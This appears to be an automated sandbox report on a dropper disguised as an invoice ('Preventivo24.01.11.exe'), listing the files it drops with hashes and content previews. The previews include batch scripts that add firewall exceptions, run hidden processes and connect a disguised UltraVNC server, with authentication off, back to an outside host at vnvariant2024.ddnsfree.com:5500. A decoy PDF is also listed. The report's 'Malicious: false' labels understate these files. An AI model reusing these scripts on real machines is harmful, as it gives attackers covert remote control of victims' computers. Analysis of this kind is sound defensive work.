._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\67266ffc-a6de-47cb-ac5a-3df74cb4d90b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/VRaWL07oXGZ4YIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxXGZ4ZGh3mlind9i4ufFXpAXkru
MD5:	41034A6B023B6BB9C723DA146E190954
SHA1:	22C95166FF8A1C4D2AAC25B75D804CEBAAA6ACF2
SHA-256:	52BB8B0CA62248721986D650004C11ACCB0C988B6FBA645D9B4E3557CA87A15D
SHA-512:	6F8CD54BBB750E32FEBD78895F433CCF0C553C56E6B7DDEA03E3EA36ED283084CF6EA6FA8999162999D184B0F04B6E6DAB7F6FC27648EE517F744D7E8DBC8AAD
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\c27b95aa-25ac-4009-8afa-c5c9042cec92.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\d0d7f3e7-a105-4a48-99c9-31e07bf890e8.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\shi6E82.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5038592
Entropy (8bit):	6.043058205786219
Encrypted:	false
SSDEEP:	49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
MD5:	11F7419009AF2874C4B0E4505D185D79
SHA1:	451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
SHA-256:	AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
SHA-512:	1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L......N.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\TempFolder\~.pdf

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PDF document, version 1.7, 1 pages
Category:	dropped
Size (bytes):	44763
Entropy (8bit):	7.691836262046289
Encrypted:	false
SSDEEP:	768:9paAbg8/yZjn2K/Cgrf7F0kTRelSLcBzWAMMwsOt+yn9:9Lyp2oLTk4ItWAMMO9
MD5:	E3B54910AAE9324A7D56E5B22044104E
SHA1:	F93D54BC3E20316DD9B596D4EB0FE22BD9F1D4D8
SHA-256:	01FA678A302763B83703F0449FC63309CF7677FC119D2755DEFAD6DEA9D25BCD
SHA-512:	0549192D6C52053BA1F1C9AFB38B2243EA8BE119DD0FBDE3D15BCBA073911B59669BEEFDFD0C8AADFCEAE44A4AF2C7B09C76EE1EC88C0E13F5406283019FCB6A
Malicious:	false
Preview:	%PDF-1.7.%.....3 0 obj.<<./Type /XObject./Subtype /Image./Width 825./Height 540./BitsPerComponent 8./ColorSpace /DeviceRGB./Filter /DCTDecode./DecodeParms <<./Quality 80.>>./Length 5 0 R.>>.stream......C.....................................%...#... , #&'))..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........9.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....C...e...4...i........W........\T...........W.........2...}_.O.&..Q.9P\........W.........2...m_.O.&.,Q.9P\........W..............?...qF(.As....6...m_.O.&.........?...qF(.As....2...}_.O.&....

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47744
Entropy (8bit):	6.688410109072587
Encrypted:	false
SSDEEP:	768:523s2H65HQdvusvavk76GDN8YeGQEky64UyToJs+i:5VQV75NzHae
MD5:	E818AB67C68E3EE621A8888FBBF2F266
SHA1:	644D473097112A48338202A418911716AAC5B9D8
SHA-256:	FF9D8F7FC2C3F5D0AFAF6F76E87D41FEEABF54FACBE26DC59661A78830F32972
SHA-512:	B67F0A1AB49E57459AFA8FD4E4FFC18BC2A8B2D7803C34A952656113D175A145AB2C1ABDE25272442759EC148BE8A5A05D44A6CE89DD882329BA436534D53BE4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W.,.W.,.W.,''.-.W.,''.-.W.,''.-.W.,./.,.W.,.<.-.W.,.W.,.W.,.<.-.W.,g&.-.W.,g&.-.W.,g&.-.W.,Rich.W.,........PE..L....Z._...........!.....f...8.......=..............................................%.....@A........................ ...`.......................................h.......8...........................................................................text....d.......f.................. ..`.rdata...'.......(...j..............@..@.data...d...........................@....reloc..h...........................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.inf

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Windows setup INFormation
Category:	modified
Size (bytes):	3890
Entropy (8bit):	3.7119439709099047
Encrypted:	false
SSDEEP:	48:5oAqyb+l0sOIbxcfW2iIVOgUqGNnijzXLTRkYx:jAIVANniNx
MD5:	D3153DDC1A7EB32C396E59E0CD2ECA50
SHA1:	285BC785A8E9D76BA652A841A4331A1F6DFE9431
SHA-256:	F615C264E1A04A5A18C62C08CABB9EBE8F76D964B04A111169F76C9036F260DD
SHA-512:	AAD64BD3A90C41E35667AA9C7B017F4FDCF0705BD2B70F105193390E3C727A2E410DBA9764BC5343220E9A2A0880B830C81AF4973DECE92AB64B90E1DC77DDC6
Malicious:	false
Preview:	..;.....;. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...i.n.f.....;.........[.V.e.r.s.i.o.n.].....P.n.p.L.o.c.k.D.o.w.n.=.1.....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e.=.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .1.0./.1.8./.2.0.2.0.,.1.7...6...4.2...4.9.9.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.=.S.t.a.n.d.a.r.d.,.N.T.x.8.6.........[.S.t.a.n.d.a.r.d...N.T.x.8.6.].....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...d.l.l.=.1...

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	data
Category:	dropped
Size (bytes):	8560
Entropy (8bit):	7.2886183166813785
Encrypted:	false
SSDEEP:	192:N0xTS0+qInYe+PjPN3KowgCuodZubhSZyEl8YsuUAwCNQw1e9:NeInYPLNaowNZvZyEPLwPws9
MD5:	B2957E97DD342E0C0C5B58CB4DF951E6
SHA1:	A21F84EB2217DA6AB5079BFEFADC29503A662F6E
SHA-256:	1105E05993AB4EA8EFD6475FFEB82091BA61387E2D4F531AE5C6097E9BF530D3
SHA-512:	093E1FC0C322DAD8C902D8B116B3D66EDA79C3A3B51A40358A202801E850728049D0702C1F03466E17A0F390EE6B79BBDA6B2B59D2151A28EA00054294BD6503
Malicious:	false
Preview:	0.!l..*.H........!]0.!Y...1.0...+......0.....+.....7......0...0...+.....7.......(..i.@..##6....201018150649Z0...+.....7.....0...0.......A.&r..{...(..R..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0....([....k.R.A.3..m..11..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0.... ....0DL....\MCT........=...ww..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ....0DL....\MCT........=...ww..0.... ...d.JZ..,.....v.d.J..i.l.6.`.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0U..+.....7...1G0E0...

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	1208
Entropy (8bit):	5.080950758931414
Encrypted:	false
SSDEEP:	24:fJhFXNTxYgMKM0USlAdo9g9iWFOWIaGEToIeXYMyd5Tgc8OjulnN:fJzr8gUUAdTZOW+ooBI9j0NOjS
MD5:	C5F11F117A37314A4DDAE8D4BFCA23B7
SHA1:	58D1DFE525248BF51847526388F8D68CD3E50EA6
SHA-256:	200A7BF46C84F3F71DACC5ECE63E87B9BEF981325DC76462076923F574E12C1D
SHA-512:	0E99FD926F0FAA0CC576C6FF509CF037FFB2596FD5CB3A8BC5B080ED7BECDF29526C5CCACD1B5EBE2E243E0ECFF8186F81A14F16D3FB3C0472F38A3F50897652
Malicious:	false
Preview:	[Permissions]..[admin]..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=1..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=No Plugin Detected..primary=1..secondary=1..SocketConnect=1..HTTPConnect=1..AutoPortSelect=1..InputsEnabled=1..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..EnableUnicodeInput=0..EnableWin8Helper=0..QuerySetting=2..QueryTimeout=10..QueryDisableTime=0..QueryAccept=0..LockSetting=0..UseRegistry=0..MSLogonRequired=0..NewMSLogon=0..DebugMode=2..Avilog=0..kickrdp=0..service_commandline=..DebugLevel=10..DisableTrayIcon=0..rdpmode=0..LoopbackOnly=0..AllowLoopback=1..AuthRequired=0..ConnectPriority=0..AuthHosts=..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..PortNumber=5900..HTTPPortNumber=5800..IdleInputTimeout=0..RemoveWallpaper=0..RemoveAero=0..QueryIfNoLogon=0..FileTransferTimeout=1..clearconsole=0..accept_reject_mesg=..KeepAliveInterval=5..[UltraVNC]..passwd=000000000000000000..passwd2=000000000000000000..[poll]..Turb

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1035
Entropy (8bit):	5.154375767864971
Encrypted:	false
SSDEEP:	24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7z2GD:6oo7urwEiNUz26
MD5:	B9B8C2AD3F16DD1EE7518B5B4ED165B1
SHA1:	FC8D881BF7B13DF8E7BF31B6F811F53C44F8336D
SHA-256:	C2AB7B8701BDC36198A8F01791C8A3479EF3E8BCC6CCD3BD8C2F60DD9672E8E1
SHA-512:	8CF8E80D8A8DB779B40005D87EFDAB57042026C62D4182129FC247F091E0C51E854509F85575BF0418A97FCAE096AA093CFB9128CF411E1993486F07A3BD966B
Malicious:	false
Preview:	::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..set /p numc=<IDD.txt..type C:\Games\cmd.txt\|cmd..start C:\Games\viewer.exe /HideWindow C:\Games\once.cmd .. ....:com ..for %%A in (C:\Games\cmmc.cmd) do if %%~zA gtr 7 start C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd..timeout /t

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1102
Entropy (8bit):	5.375478540906423
Encrypted:	false
SSDEEP:	24:np9ZV2tXY7ur3C7TEPaV1k774kIwoNEGMoNha9d0aR/vA+ZyZB:5oo7urwEieG75aRQ+Zs
MD5:	8AADF3A1016440B07F8F3152E5755A41
SHA1:	9B6FC4D8890FE08F427928A6ACCEF39F592FB271
SHA-256:	B3C509FC687793ED75F2792540EFBDAB88D65CA18570C28651DA737CAC6544B7
SHA-512:	40DA5935BFD778559B1EC982B3C3B928766E288BC00BE3C8A85C41B9942E2E66CC19C5CCB4F1105AC5C2DEA3EE44FF9F421895CFBF6DBB6B58AB1226C4C0A1BF
Malicious:	false
Preview:	Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline \| findstr /i %RUN_C%> NUL..if errorlevel 1 (..start C:\Games\taskhost.exe -autoreconnect ID:%numc% -connec

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1221
Entropy (8bit):	5.351088398106411
Encrypted:	false
SSDEEP:	24:op9ZV2tXY7ur3C7TEPaV1k774kIg4P5W40aJfiyZr/vA+coq+Hoq+Hoq+e:coo7urwEi0LahVQ+cx+Hx+Hx+e
MD5:	76147E456F8F392405B1FBAC4F315A30
SHA1:	FC90A4B0428DF537ED3FEE1A1B2E25C3C2A07D5A
SHA-256:	D69E739F18BD24DB5CFD451FB2BDAB32B4EFEEF41145B75CB89C7DC56641852D
SHA-512:	470EE57AC19364CCF4CDD8019A168440822E3E2B2708A3C4B5A4C5C0A3090C1BFEC1248E6AB1B23F93B5434FED3C69210A2161A56747231C25972752493AFD7C
Malicious:	false
Preview:	SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%999 +100..set /a numb=%random% %%999 +100..set /a numc=5%numa%%numb%....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline \| findstr /i %RUN_C%> NUL..if errorlevel 1 (..start %temp%/~.pdf..) else (.. @echo not starting %RUN_C%: already running...)..echo %numc% > IDD.txt..rem start C:\Games\taskhost.exe -multi -autoreconnect ID:%numc% -connect vnvariant2024.ddnsfree.com:5500 -run..start C:

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	253280
Entropy (8bit):	6.610000632203147
Encrypted:	false
SSDEEP:	6144:vroB+yBBquE2s4MSp5Y1HKKfkXNoIij+bvNf4wmNJh/WLX:E+yhEBge1H0rij+RQwgh/Wz
MD5:	1D34EBEE7F7B9966DC449388438E80D5
SHA1:	E3A30BC84D733ED907A2CBBFC3F5E16900A5B2CE
SHA-256:	0D44439A0425DF8ABF338BD1496679A144DD705A51832A05C1A4ED1F76756EBA
SHA-512:	D7A8AC4E9D824DCB1C8AF5574E7818ED6F515A75C47F50AB380492F87CF0D0AC853956DD93262286C064FFE5E48CEC899A960DD20E466B74E911C88975AB3E0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C...........h......h.....h......U......U...b..U......h........................A..........Rich...........PE..L......_...........!.........$.......j...................................................@..........................u.......u..........................`............1..p...........................P2..@............................................text...o........................... ..`.rdata..............................@..@.data....+...........p..............@....SharedD............................@....rsrc...............................@..@.reloc...........0..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\on.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	799
Entropy (8bit):	5.23166754615022
Encrypted:	false
SSDEEP:	24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7oy:6oo7urwEiNUoy
MD5:	FD877AE342E4E8B246D11700EB90B23D
SHA1:	9C1790DB6B9CBD9C5BF2B12B8FBCF6A342A6FD3A
SHA-256:	1CE4768F825372D55C1D30CE3AC41AFB913DE6299A64AE5B0AC1B3B752421D64
SHA-512:	2B26CAE19DC5C485076C6C8C740F5E621F1B507163D26FB8E31CCE78F6917A170FE9D9BA0976E7C6079ED50F448FCEA1C365E0B3F4C522981C10330C04932E99
Malicious:	false
Preview:	::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..start C:\Games\viewer.exe /HideWindow C:\Games\c.cmd..EXIT

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\once.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:4Q:4Q
MD5:	F24F62EEB789199B9B2E467DF3B1876B
SHA1:	DE3AC21778E51DE199438300E1A9F816C618D33A
SHA-256:	E596899F114B5162402325DFB31FDAA792FABED718628336CC7A35A24F38EAA9
SHA-512:	C2636AD578F7B925EE4CF573969D4EC6640DE7B0176BF1701ADECE3A75937DC206AB1B8EE5343341D102C3BED1EC804A5C2A9E1222A7FB53A3CC02DA55487329
Malicious:	false
Preview:	exit

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\powercfg.msi

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
